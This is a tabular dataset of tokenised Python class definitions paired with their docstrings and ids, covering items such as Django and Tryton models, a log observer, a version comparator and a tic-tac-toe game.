code (stringlengths 4-4.48k) | docstring (stringlengths 1-6.45k) | _id (stringlengths 24) |
---|---|---|
class UserAgent(base.UserAgent): <NEW_LINE> <INDENT> def __init__(self, device_object): <NEW_LINE> <INDENT> self.device_object = device_object <NEW_LINE> self.certainty = device_object.accuracy <NEW_LINE> <DEDENT> def getCertainty(self): <NEW_LINE> <INDENT> return self.certainty <NEW_LINE> <DEDENT> def getMatchedUserAgent(self): <NEW_LINE> <INDENT> return self.device_object.devua <NEW_LINE> <DEDENT> def get(self, name): <NEW_LINE> <INDENT> if name == "is_wireless_device": <NEW_LINE> <INDENT> return self.device_object.is_wireless_device <NEW_LINE> <DEDENT> if not self.device_object.is_wireless_device: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> if name == "usableDisplayWidth": <NEW_LINE> <INDENT> return self.device_object.max_image_width <NEW_LINE> <DEDENT> elif name == "usableDisplayHeight": <NEW_LINE> <INDENT> return self.device_object.max_image_height <NEW_LINE> <DEDENT> elif name == "model": <NEW_LINE> <INDENT> return self.device_object.model_name <NEW_LINE> <DEDENT> elif name == "vendor": <NEW_LINE> <INDENT> return self.device_object.brand_name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None | Wurfl record wrapper, abstracted in mobile.sniffer way.
| 625990863317a56b869bf306 |
class StatementOfAccountStart(ModelView): <NEW_LINE> <INDENT> __name__ = 'account.statement.of.account.start' <NEW_LINE> fiscalyear = fields.Many2One('account.fiscalyear', 'Fiscal Year', required=True) <NEW_LINE> account = fields.Many2One('account.account', 'Account', domain=[('kind', '!=', 'view')], required=True) <NEW_LINE> party = fields.Many2One('party.party', 'Party') <NEW_LINE> @staticmethod <NEW_LINE> def default_fiscalyear(): <NEW_LINE> <INDENT> FiscalYear = Pool().get('account.fiscalyear') <NEW_LINE> return FiscalYear.find(Transaction().context.get('company'), exception=False) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def default_account(): <NEW_LINE> <INDENT> model = Transaction().context.get('active_model') <NEW_LINE> if model == 'account.account': <NEW_LINE> <INDENT> return Transaction().context.get('active_id') <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def default_party(): <NEW_LINE> <INDENT> model = Transaction().context.get('active_model') <NEW_LINE> if model == 'party.party': <NEW_LINE> <INDENT> return Transaction().context.get('active_id') <NEW_LINE> <DEDENT> return None | Statement of Account | 625990863617ad0b5ee07cd5 |
class ChangeItemsHandler(BaseHandler): <NEW_LINE> <INDENT> @check('login') <NEW_LINE> def GET(self): <NEW_LINE> <INDENT> return self.write(success({'items': config.ITEMS})) | Change items | 625990867c178a314d78e9ac |
class ODict(collections.OrderedDict): <NEW_LINE> <INDENT> def __init__(self, pairs=[]): <NEW_LINE> <INDENT> if isinstance(pairs, dict): <NEW_LINE> <INDENT> raise Exception("ODict does not allow construction from a dict") <NEW_LINE> <DEDENT> super(ODict, self).__init__(pairs) <NEW_LINE> old_items = self.items <NEW_LINE> self.items = lambda: odict_items(old_items()) | A wrapper for OrderedDict that doesn't allow sorting of keys | 6259908644b2445a339b771e |
class JobQueue(object): <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self._queue = {} <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "Queue:%s,%d jobs"%(self.name, len(self._queue)) <NEW_LINE> <DEDENT> def __getitem__(self, key): <NEW_LINE> <INDENT> return self._queue[key] <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> for job in self._queue: <NEW_LINE> <INDENT> yield job <NEW_LINE> <DEDENT> <DEDENT> def len(self): <NEW_LINE> <INDENT> return len(self._queue) <NEW_LINE> <DEDENT> def add(self, job): <NEW_LINE> <INDENT> self._queue[job.job_id] = job <NEW_LINE> <DEDENT> def queue(self): <NEW_LINE> <INDENT> return self._queue <NEW_LINE> <DEDENT> def populate(self, start_date, end_date, cmdline): <NEW_LINE> <INDENT> for day in Helper.date_range(start_date, end_date): <NEW_LINE> <INDENT> job_cmdline = Helper.format_cmd_line(cmdline, day) <NEW_LINE> yyyymmdd = day.strftime("%Y%m%d") <NEW_LINE> job = Job(yyyymmdd, job_cmdline) <NEW_LINE> self.add(job) | This object represents Queue of Job objects | 6259908663b5f9789fe86cee |
class ContBatchNorm3d(nn.modules.batchnorm._BatchNorm): <NEW_LINE> <INDENT> def _check_input_dim(self, input): <NEW_LINE> <INDENT> if input.dim() != 5: <NEW_LINE> <INDENT> raise ValueError('expected 5D input (got {}D input)' .format(input.dim())) <NEW_LINE> <DEDENT> <DEDENT> def forward(self, input): <NEW_LINE> <INDENT> self._check_input_dim(input) <NEW_LINE> print('Check is OK.') <NEW_LINE> return F.batch_norm( input, self.running_mean, self.running_var, self.weight, self.bias, True, self.momentum, self.eps) | Normalize the input and check if the convolution size matrix is 5*5.
For more info check documentation of torch.nn.BatchNorm1d . | 625990864527f215b58eb762 |
class ContactForm(FlaskForm): <NEW_LINE> <INDENT> mail_subject = StringField("Subject: ", validators=[Length(min=5, max=250)]) <NEW_LINE> mail_body = TextAreaField(validators=[DataRequired(), Length(min=5)]) <NEW_LINE> sent_by = StringField("Your Email: ", validators=[DataRequired(), Email()]) <NEW_LINE> submit = SubmitField("Send Email") | A Flask-WTF form to send me an email | 6259908626068e7796d4e4c8 |
class ExpasyGetter(Obo): <NEW_LINE> <INDENT> bioversions_key = ontology = PREFIX <NEW_LINE> typedefs = [has_member, has_molecular_function] <NEW_LINE> def iter_terms(self, force: bool = False) -> Iterable[Term]: <NEW_LINE> <INDENT> return get_terms(version=self._version_or_raise, force=force) | A getter for ExPASy Enzyme Classes. | 62599086bf627c535bcb3059 |
class PuzzleView(SubView): <NEW_LINE> <INDENT> def __init__(self, parent: View, frame: tk.Frame): <NEW_LINE> <INDENT> super().__init__(parent, frame) <NEW_LINE> self.clue = tk.StringVar(self.root) <NEW_LINE> self.clue_label = tk.Label(self.frame, textvariable=self.clue) <NEW_LINE> self.time = tk.StringVar(self.root) <NEW_LINE> self.time_label = tk.Label(self.frame, textvariable=self.time) <NEW_LINE> self.canvas = tk.Canvas(self.frame) <NEW_LINE> self.cells = None <NEW_LINE> self.load() <NEW_LINE> <DEDENT> def load(self, width=DEFAULT_PUZZLE_WIDTH, height=DEFAULT_PUZZLE_HEIGHT): <NEW_LINE> <INDENT> clue_style = dict(appearance.puzzle.clues) <NEW_LINE> self.clue_label.config(**clue_style) <NEW_LINE> self.clue_label.grid(row=0, sticky=tk.W) <NEW_LINE> time_style = dict(appearance.puzzle.time) <NEW_LINE> self.time_label.config(**time_style) <NEW_LINE> self.time_label.grid(row=0, padx=TINY_PAD+1, sticky=tk.E) <NEW_LINE> canvas_width = appearance.puzzle.cell.size*width + CANVAS_PAD <NEW_LINE> canvas_height = appearance.puzzle.cell.size*height + CANVAS_PAD <NEW_LINE> border_fill = appearance.puzzle.fg <NEW_LINE> self.canvas.config(width=canvas_width, height=canvas_height, highlightthickness=0) <NEW_LINE> self.canvas.grid(row=1, pady=PAD, padx=(CANVAS_PAD_LEFT, 0)) <NEW_LINE> box_width = canvas_width - CANVAS_PAD <NEW_LINE> box_height = canvas_height - CANVAS_PAD <NEW_LINE> self.canvas.create_rectangle(0, 0, box_width, box_height, outline=border_fill) | The puzzle group of the crossword application. | 625990864a966d76dd5f0a6c |
class _Basis(CombinatorialFreeModule, BindableClass): <NEW_LINE> <INDENT> def __init__(self, algebra, prefix=None): <NEW_LINE> <INDENT> if prefix is None: <NEW_LINE> <INDENT> self._prefix = self._basis_name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._prefix = prefix <NEW_LINE> <DEDENT> CombinatorialFreeModule.__init__(self, algebra.base_ring(), algebra._W, category=algebra._BasesCategory(), sorting_key=sorting_key, prefix=self._prefix) <NEW_LINE> <DEDENT> _basis_name = None <NEW_LINE> def _repr_term(self, t): <NEW_LINE> <INDENT> redword = t.reduced_word() <NEW_LINE> if len(redword) == 0: <NEW_LINE> <INDENT> return "1" <NEW_LINE> <DEDENT> return self._print_options['prefix'] + '[%s]'%','.join('%d'%i for i in redword) <NEW_LINE> <DEDENT> def _latex_term(self, t): <NEW_LINE> <INDENT> redword = t.reduced_word() <NEW_LINE> if len(redword) == 0: <NEW_LINE> <INDENT> return '1' <NEW_LINE> <DEDENT> return ''.join("%s_{%d}"%(self._print_options['prefix'], i) for i in redword) <NEW_LINE> <DEDENT> def product_on_basis(self, w1, w2): <NEW_LINE> <INDENT> return self(self.to_T_basis(w1) * self.to_T_basis(w2)) | Technical methods (i.e., not mathematical) that are inherited by each
basis of the algebra. These methods cannot be defined in the category. | 6259908650812a4eaa621988 |
class Invoice(SerializableModel): <NEW_LINE> <INDENT> customer = db.ReferenceProperty(Customer, collection_name='invoices') <NEW_LINE> total_price = DecimalProperty() <NEW_LINE> currency = db.StringProperty(choices=CURRENCY_CHOICES, default=DEFAULT_CURRENCY) <NEW_LINE> status = db.StringProperty(choices=INVOICE_STATUS_CHOICES, default=INVOICE_STATUS_DRAFT) <NEW_LINE> status_reason = db.StringProperty() | Maintains invoice information for orders placed by customers.
Helps answer these questions:
1. What was the total price of the invoice?
2. Who was the customer?
3. What currency was used for invoicing?
4. What was ordered by the customer?
5. When was the invoice generated?
6. How many and which transactions were used to satisfy payment for this invoice? | 6259908697e22403b383ca7e |
class Link(DatetimeModel, NullableGenericModel, AuthorableModel, IconModel, WeightedModel, UUID64Model): <NEW_LINE> <INDENT> TYPES = ((0, _("Text")), (1, _("Icon")), (2, _("Icon and text")), (3, _("oEmbed")), (4, _("Flash"))) <NEW_LINE> group = models.CharField(max_length=16, blank=True, db_index=True, verbose_name=_("Group"), help_text=_("Use the same name to group icons.")) <NEW_LINE> display = models.SmallIntegerField(choices=TYPES, default=0, db_index=True, help_text=_("Default display mode of this link"), verbose_name=_("Type")) <NEW_LINE> url = models.URLField(max_length=255, unique=True, verbose_name=_("URL")) <NEW_LINE> anchor = models.CharField(max_length=192, blank=True, verbose_name=_("Anchor")) <NEW_LINE> title = models.CharField(max_length=128, blank=True, verbose_name=_("Title")) <NEW_LINE> target = models.CharField(max_length=16, default="_self", blank=True, verbose_name=_("Target")) <NEW_LINE> nofollow = models.BooleanField(default=True, verbose_name=_("No-follow")) <NEW_LINE> remainder = models.CharField(max_length=64, blank=True, verbose_name=_("HTML Remainder"), help_text=_("HTML code of extra tag attributes")) <NEW_LINE> information = models.TextField(blank=True, default="", help_text=_("Internal information for the link"), verbose_name=_("Information")) <NEW_LINE> description = models.TextField(blank=True, default="", verbose_name=_("Description")) <NEW_LINE> objects = LinkManager() <NEW_LINE> def html(self, display=None): <NEW_LINE> <INDENT> display = display if display is not None else self.display <NEW_LINE> return render_to_string("content/display/link/link.html", {'item': self, display: display}) <NEW_LINE> <DEDENT> @addattr(boolean=True) <NEW_LINE> def is_valid(self): <NEW_LINE> <INDENT> parsed = parse.urlparse(self.url) <NEW_LINE> try: <NEW_LINE> <INDENT> URLValidator(self.url) <NEW_LINE> <DEDENT> except ValidationError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return parsed.scheme in ['http', 'https', ''] and parsed.netloc != '' <NEW_LINE> <DEDENT> @addattr(boolean=True) <NEW_LINE> def exists(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> if self.is_valid(): <NEW_LINE> <INDENT> get_url_resource(self.url) <NEW_LINE> return True <NEW_LINE> <DEDENT> return False <NEW_LINE> <DEDENT> except URLError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def get_oembed(self): <NEW_LINE> <INDENT> from micawber import parsers <NEW_LINE> result = parsers.extract(self.url, bootstrap_oembed) <NEW_LINE> return result[1][self.url] <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.url <NEW_LINE> <DEDENT> class Meta: <NEW_LINE> <INDENT> verbose_name = _("link") <NEW_LINE> verbose_name_plural = _("links") <NEW_LINE> app_label = 'content' | Lien interne ou externe | 625990867047854f46340f3b |
@dataclass <NEW_LINE> class JobAssignment(object): <NEW_LINE> <INDENT> job: Job <NEW_LINE> assignee: Optional[scroll_util.Brother] <NEW_LINE> signer: Optional[scroll_util.Brother] <NEW_LINE> late: bool <NEW_LINE> bonus: bool <NEW_LINE> def to_raw(self) -> Tuple[str, str, str, str, str, str, str]: <NEW_LINE> <INDENT> signer_name = self.signer.name if self.signer is not None else SIGNOFF_PLACEHOLDER <NEW_LINE> late = "y" if self.late else "n" <NEW_LINE> bonus = "y" if self.bonus else "n" <NEW_LINE> assignee = self.assignee.name if self.assignee else NOT_ASSIGNED <NEW_LINE> return self.job.name, self.job.house, self.job.day_of_week, assignee, signer_name, late, bonus | Tracks a job's assignment and completion | 62599086283ffb24f3cf5427 |
class Solution: <NEW_LINE> <INDENT> def productExceptSelf(self, nums: List[int]) -> List[int]: <NEW_LINE> <INDENT> result = [1] * len(nums) <NEW_LINE> for i in range(1, len(nums)): <NEW_LINE> <INDENT> result[i] = nums[i-1] * result[i-1] <NEW_LINE> <DEDENT> right_prod = 1 <NEW_LINE> for i in range(len(nums)-1, -1, -1): <NEW_LINE> <INDENT> result[i] *= right_prod <NEW_LINE> right_prod *= nums[i] <NEW_LINE> <DEDENT> return result | Time complexity: O(n)
Space complexity: O(1) - output array does not count as extra space as per problem description. | 62599086f9cc0f698b1c608f |
class FileLogObserver(_GlobalStartStopMixIn): <NEW_LINE> <INDENT> timeFormat = None <NEW_LINE> def __init__(self, f): <NEW_LINE> <INDENT> self.write = f.write <NEW_LINE> self.flush = f.flush <NEW_LINE> <DEDENT> def getTimezoneOffset(self, when): <NEW_LINE> <INDENT> offset = datetime.utcfromtimestamp(when) - datetime.fromtimestamp(when) <NEW_LINE> return offset.days * (60 * 60 * 24) + offset.seconds <NEW_LINE> <DEDENT> def formatTime(self, when): <NEW_LINE> <INDENT> if self.timeFormat is not None: <NEW_LINE> <INDENT> return datetime.fromtimestamp(when).strftime(self.timeFormat) <NEW_LINE> <DEDENT> tzOffset = -self.getTimezoneOffset(when) <NEW_LINE> when = datetime.utcfromtimestamp(when + tzOffset) <NEW_LINE> tzHour = abs(int(tzOffset / 60 / 60)) <NEW_LINE> tzMin = abs(int(tzOffset / 60 % 60)) <NEW_LINE> if tzOffset < 0: <NEW_LINE> <INDENT> tzSign = '-' <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> tzSign = '+' <NEW_LINE> <DEDENT> return '%d-%02d-%02d %02d:%02d:%02d%s%02d%02d' % ( when.year, when.month, when.day, when.hour, when.minute, when.second, tzSign, tzHour, tzMin) <NEW_LINE> <DEDENT> def emit(self, eventDict): <NEW_LINE> <INDENT> text = textFromEventDict(eventDict) <NEW_LINE> if text is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> timeStr = self.formatTime(eventDict["time"]) <NEW_LINE> fmtDict = { "system": eventDict["system"], "text": text.replace("\n", "\n\t") } <NEW_LINE> msgStr = _safeFormat("[%(system)s] %(text)s\n", fmtDict) <NEW_LINE> util.untilConcludes(self.write, timeStr + " " + msgStr) <NEW_LINE> util.untilConcludes(self.flush) | Log observer that writes to a file-like object.
@type timeFormat: C{str} or C{NoneType}
@ivar timeFormat: If not C{None}, the format string passed to strftime(). | 625990867cff6e4e811b75ca |
class TaskThread(): <NEW_LINE> <INDENT> def __init__(self,tid): <NEW_LINE> <INDENT> self.tid = tid <NEW_LINE> <DEDENT> def run_tasks(self,tid): <NEW_LINE> <INDENT> task_obj = TestTask.objects.get(id=tid) <NEW_LINE> case_list = task_obj.cases.split(",") <NEW_LINE> case_list.pop(-1) <NEW_LINE> task_obj.status=1 <NEW_LINE> task_obj.save() <NEW_LINE> cases_all = {} <NEW_LINE> for case_id in case_list: <NEW_LINE> <INDENT> print(case_id) <NEW_LINE> cases_obj = TestCase.objects.get(pk=case_id) <NEW_LINE> case_dict = { "url": cases_obj.url, "req_methed": cases_obj.req_methed, "req_type": cases_obj.req_type, "req_header": cases_obj.req_header, "req_para": cases_obj.req_para, "response_assert": cases_obj.response_assert } <NEW_LINE> cases_all[cases_obj.id] = case_dict <NEW_LINE> <DEDENT> json_str = json.dumps(cases_all) <NEW_LINE> case_data_file = TASK_PATH + "cases_data.json" <NEW_LINE> with open(case_data_file, "w+") as f: <NEW_LINE> <INDENT> f.write(json_str) <NEW_LINE> <DEDENT> os.system("python3 " + RUN_TASK_FILE) <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> threads = [] <NEW_LINE> t = threading.Thread(target=self.run_tasks,args=(self.tid,)) <NEW_LINE> threads.append(t) <NEW_LINE> for i in threads: <NEW_LINE> <INDENT> i.start() <NEW_LINE> <DEDENT> for i in threads: <NEW_LINE> <INDENT> i.join() <NEW_LINE> <DEDENT> sleep(2) <NEW_LINE> self.save_result() <NEW_LINE> task_obj = TestTask.objects.get(id=self.tid) <NEW_LINE> task_obj.status = 2 <NEW_LINE> task_obj.save() <NEW_LINE> <DEDENT> def run_new(self): <NEW_LINE> <INDENT> threads = [] <NEW_LINE> t = threading.Thread(target=self.run) <NEW_LINE> threads.append(t) <NEW_LINE> for i in threads: <NEW_LINE> <INDENT> i.start() <NEW_LINE> <DEDENT> <DEDENT> def save_result(self): <NEW_LINE> <INDENT> dom = minidom.parse(TASK_PATH +"results.xml") <NEW_LINE> root = dom.documentElement <NEW_LINE> ts = root.getElementsByTagName("testsuite") <NEW_LINE> name = ts[0].getAttribute("name") <NEW_LINE> errors = ts[0].getAttribute("errors") <NEW_LINE> failures = ts[0].getAttribute("failures") <NEW_LINE> skipped = ts[0].getAttribute("skipped") <NEW_LINE> tests = ts[0].getAttribute("tests") <NEW_LINE> run_time = ts[0].getAttribute("time") <NEW_LINE> with open((TASK_PATH +"results.xml"),"r",encoding="utf-8") as file: <NEW_LINE> <INDENT> result = file.read() <NEW_LINE> <DEDENT> TestResult.objects.create(name=name,errors=errors, failures=failures,skipped=skipped, tests=tests,run_time=run_time, task_id = self.tid,result=result) | '实现测试任务的多线程 | 625990867c178a314d78e9ae |
class Rating(models.Model): <NEW_LINE> <INDENT> Source = models.CharField(max_length=100) <NEW_LINE> Value = models.CharField(max_length=100) <NEW_LINE> movie_detail = models.ForeignKey(MovieDetail, on_delete=models.CASCADE, related_name="Ratings") <NEW_LINE> def __str__(self): <NEW_LINE> <INDENT> return f'Ratings from {self.Source} for {self.movie_detail})' | Stores movie ratings and is related to Movie detail model | 6259908660cbc95b06365b30 |
class Robot: <NEW_LINE> <INDENT> population = 0 <NEW_LINE> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> print('(Инициализация {0})'.format(self.name)) <NEW_LINE> Robot.population += 1 <NEW_LINE> <DEDENT> def __del__(self): <NEW_LINE> <INDENT> print('{0} уничтожается!'.format(self.name)) <NEW_LINE> Robot.population -= 1 <NEW_LINE> if Robot.population == 0: <NEW_LINE> <INDENT> print('{0} был последним.'.format(self.name)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print('Осталось {0:d} работающих роботов.'.format(Robot.population)) <NEW_LINE> <DEDENT> <DEDENT> def sayHi(self): <NEW_LINE> <INDENT> print('Приветствую! Мои хозяева называют меня {0}.'.format(self.name)) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def howMany(): <NEW_LINE> <INDENT> print('У нас {0:d} роботов.'.format(Robot.population)) | Represents a robot with a name. | 625990863317a56b869bf309 |
class Version(object): <NEW_LINE> <INDENT> def __init__(self, version, rel_type=None): <NEW_LINE> <INDENT> self._parts = [int(part) for part in version.split(".")] <NEW_LINE> self._str = version <NEW_LINE> self._type = rel_type <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return str(self._parts) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self._str <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> return ver1 == ver2 <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> return ver1 != ver2 <NEW_LINE> <DEDENT> def __gt__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] > pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] < pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) > len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __lt__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] < pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] > pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) < len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __ge__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] > pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] < pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) >= len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __le__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] < pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] > pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) <= len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def decorated(self): <NEW_LINE> <INDENT> if self._type is not None: <NEW_LINE> <INDENT> return self._str + " ({})".format(self._type) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return self._str | Version control object.
Creates multi-part version number functionality.
Using str(instance) returns a string containing dot separated numbers.
Args:
version (str): Dot separated integer string (e.g. "1.0.2")
rel_type (str): Release type (e.g. "beta", "stable", etc.).
Used to generate decorated string, for display purposes.
Attributes:
decorated (str): Decorated string, in format "<dot separated version number> (<rel_type>)" (e.g. "1.0.2 (stable)"). | 62599086aad79263cf430345 |
class MyPickleableObject(tf.__internal__.tracking.AutoTrackable): <NEW_LINE> <INDENT> @property <NEW_LINE> @layer_utils.cached_per_instance <NEW_LINE> def my_id(self): <NEW_LINE> <INDENT> _PICKLEABLE_CALL_COUNT[self] += 1 <NEW_LINE> return id(self) | Needed for InterfaceTests.test_property_cache_serialization.
This class must be at the top level. This is a constraint of pickle,
unrelated to `cached_per_instance`. | 62599087f9cc0f698b1c6091 |
class name(baseMODS): <NEW_LINE> <INDENT> affiliations = models.ListField(affiliation) <NEW_LINE> altRepGroup = models.Attribute() <NEW_LINE> authority = models.Attribute() <NEW_LINE> authorityURI = models.Attribute() <NEW_LINE> descriptions = models.ListField(description) <NEW_LINE> displayForms = models.ListField(displayForm) <NEW_LINE> displayLabel = models.Attribute() <NEW_LINE> mods_ID = models.Attribute() <NEW_LINE> mods_type = models.Attribute() <NEW_LINE> nameParts = models.ListField(namePart) <NEW_LINE> nameTitleGroup = models.Attribute() <NEW_LINE> roles = models.ListField(role) <NEW_LINE> usage = models.Attribute() <NEW_LINE> valueURI = models.Attribute() <NEW_LINE> xlink = models.Attribute() <NEW_LINE> def load_xml(self, name_element): <NEW_LINE> <INDENT> set_attributes(name_element,self) <NEW_LINE> affiliation_elements = name_element.findall('{%s}affiliation' % ns.MODS) <NEW_LINE> for element in affiliation_elements: <NEW_LINE> <INDENT> new_affiliation = affiliation() <NEW_LINE> affiliation.load_xml(element) <NEW_LINE> self.affiliations.append(affiliation) <NEW_LINE> <DEDENT> description_elements = name_element.findall('{%s}description' % ns.MODS) <NEW_LINE> for element in description_elements: <NEW_LINE> <INDENT> new_description = description() <NEW_LINE> new_description.load_xml(element) <NEW_LINE> self.descriptions.append(new_description) <NEW_LINE> <DEDENT> display_form_elements = name_element.findall('{%s}displayForm' % ns.MODS) <NEW_LINE> for element in display_form_elements: <NEW_LINE> <INDENT> new_display_form = displayForm() <NEW_LINE> new_display_form.load_xml(element) <NEW_LINE> self.displayForms.append(new_display_form) <NEW_LINE> <DEDENT> name_part_elements = name_element.findall('{%s}namePart' % ns.MODS) <NEW_LINE> for element in name_part_elements: <NEW_LINE> <INDENT> new_name_part = namePart() <NEW_LINE> new_name_part.load_xml(element) <NEW_LINE> self.nameParts.append(new_name_part) <NEW_LINE> <DEDENT> role_elements = name_element.findall('{%s}role' % ns.MODS) <NEW_LINE> for element in role_elements: <NEW_LINE> <INDENT> new_role = role() <NEW_LINE> new_role.load_xml(element) <NEW_LINE> self.roles.append(new_role) <NEW_LINE> <DEDENT> self.save() | name MODS element in Redis datastore | 62599087a8370b77170f1f58 |
class EventletServer(ServerAdapter): <NEW_LINE> <INDENT> def run(self, handler): <NEW_LINE> <INDENT> from eventlet import wsgi, listen <NEW_LINE> try: <NEW_LINE> <INDENT> wsgi.server(listen((self.host, self.port)), handler, log_output=(not self.quiet)) <NEW_LINE> <DEDENT> except TypeError: <NEW_LINE> <INDENT> wsgi.server(listen((self.host, self.port)), handler) | Untested | 62599087bf627c535bcb305f |
class TicTacToe( TwoPlayersGame ): <NEW_LINE> <INDENT> def __init__(self, players): <NEW_LINE> <INDENT> self.players = players <NEW_LINE> self.board = [0 for i in range(9)] <NEW_LINE> self.nplayer = 1 <NEW_LINE> <DEDENT> def possible_moves(self): <NEW_LINE> <INDENT> return [i+1 for i,e in enumerate(self.board) if e==0] <NEW_LINE> <DEDENT> def make_move(self, move): <NEW_LINE> <INDENT> self.board[move-1] = self.nplayer <NEW_LINE> <DEDENT> def unmake_move(self, move): <NEW_LINE> <INDENT> self.board[move-1] = 0 <NEW_LINE> <DEDENT> def lose(self): <NEW_LINE> <INDENT> return any( [all([(self.board[c-1]== self.nopponent) for c in line]) for line in [[1,2,3],[4,5,6],[7,8,9], [1,4,7],[2,5,8],[3,6,9], [1,5,9],[3,5,7]]]) <NEW_LINE> <DEDENT> def is_over(self): <NEW_LINE> <INDENT> return (self.possible_moves() == []) or self.lose() <NEW_LINE> <DEDENT> def show(self): <NEW_LINE> <INDENT> print ('\n'+'\n'.join([ ' '.join([['.','O','X'][self.board[3*j+i]] for i in range(3)]) for j in range(3)]) ) <NEW_LINE> <DEDENT> def scoring(self): <NEW_LINE> <INDENT> return -100 if self.lose() else 0 | The board positions are numbered as follows:
7 8 9
4 5 6
1 2 3 | 62599087656771135c48adf6 |
class Node: <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.edges = dict() <NEW_LINE> self.edgeset = set() <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> return iter(self.edges.values()) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return str(self.name) <NEW_LINE> <DEDENT> def add_edge(self, edge): <NEW_LINE> <INDENT> self.edges[edge.kwd] = edge <NEW_LINE> self.edgeset.add(edge.kwd) <NEW_LINE> <DEDENT> def select_edge(self, kwdset, partial=False, count=0): <NEW_LINE> <INDENT> match = self.edgeset & kwdset <NEW_LINE> if len(match) > 1: <NEW_LINE> <INDENT> log.info(f'Found match of {match}') <NEW_LINE> raise ValueError('Ambiguous...Too many edges match. ' 'Check for problems with graph table.') <NEW_LINE> <DEDENT> elif len(match) == 1: <NEW_LINE> <INDENT> ans = self.edges[match.pop()] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if 'default' in self.edges: <NEW_LINE> <INDENT> if not partial or (partial and count < len(kwdset)): <NEW_LINE> <INDENT> ans = self.edges['default'] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> ans = Edge('default', [None, None, None, None], None) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> log.info('No match... Multiple edges but no default.') <NEW_LINE> ans = Edge('default', [None, None, None, None], None) <NEW_LINE> <DEDENT> <DEDENT> return ans | A Node correspondes to a graph table 'innode'.
Nodes are attached to each other by Edges. | 62599087283ffb24f3cf542c |
